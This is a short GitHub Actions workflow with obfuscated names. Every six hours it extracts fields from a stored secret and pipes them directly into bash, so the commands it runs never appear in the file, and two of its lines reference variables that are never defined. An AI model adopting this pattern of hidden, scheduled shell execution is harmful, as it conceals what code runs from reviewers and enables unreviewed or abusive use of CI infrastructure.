name: liangjiajiang9129
on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liangjiajiang9129
        env:
          zk46: ${{ secrets.zk46 }}
        run: |
          echo $zk46 | jq -r .xbapi86954 | /bin/bash
          echo $nvvh20 | jq -r .nbvuv75875 | /bin/bash
          echo $co660 | jq -r .rax6 | /bin/bash

